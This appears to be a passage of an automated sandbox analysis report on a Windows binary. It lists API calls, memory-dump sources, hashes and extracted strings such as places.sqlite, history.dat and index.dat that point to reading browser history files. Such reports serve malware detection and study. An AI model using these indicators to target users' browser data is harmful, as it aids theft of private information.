                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                                                                                                • String ID: history.dat$places.sqlite
                                                                                                                                                                • API String ID: 3093078384-467022611
                                                                                                                                                                • Opcode ID: 0d9359b71a36c6a5ae09cc3eb1ef66efc5ef5f63627713107dbdf360f7abf22a
                                                                                                                                                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                • Opcode Fuzzy Hash: 0d9359b71a36c6a5ae09cc3eb1ef66efc5ef5f63627713107dbdf360f7abf22a
                                                                                                                                                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 839530781-0
                                                                                                                                                                • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                                                                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                                                                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                                • String ID: *.*$index.dat
                                                                                                                                                                • API String ID: 1974802433-2863569691
                                                                                                                                                                • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@mallocmemcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3831604043-0
                                                                                                                                                                • Opcode ID: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                • Opcode Fuzzy Hash: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$FilePointer
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1156039329-0
                                                                                                                                                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1631957507-0
                                                                                                                                                                • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1125800050-0
                                                                                                                                                                • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: d
                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset
                                                                                                                                                                • String ID: BINARY
                                                                                                                                                                • API String ID: 2221118986-907554435
                                                                                                                                                                • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                                                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                                                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                                • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1161345128-0
                                                                                                                                                                • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                                                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                                                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                                • String ID: /stext
                                                                                                                                                                • API String ID: 2081463915-3817206916
                                                                                                                                                                • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                                                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                                                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 159017214-0
                                                                                                                                                                • Opcode ID: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                                                                                                                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                • Opcode Fuzzy Hash: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                                                                                                                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: malloc
                                                                                                                                                                • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                • API String ID: 2803490479-1168259600
                                                                                                                                                                • Opcode ID: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                                                                                                                                                                • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                                                                                • Opcode Fuzzy Hash: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                                                                                                                                                                • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcmpmemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1065087418-0
                                                                                                                                                                • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                                                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                                                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                • memcpy.MSVCRT ref: 00406E09
                                                                                                                                                                • memcpy.MSVCRT ref: 00406E5A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$??2@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3700833809-0
                                                                                                                                                                • Opcode ID: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
                                                                                                                                                                • Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
                                                                                                                                                                • Opcode Fuzzy Hash: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
                                                                                                                                                                • Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2221118986-0
                                                                                                                                                                • Opcode ID: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                                                                                                                • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                                • Opcode Fuzzy Hash: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                                                                                                                • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1297977491-0
                                                                                                                                                                • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                                • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                                • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                  • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1481295809-0
                                                                                                                                                                • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
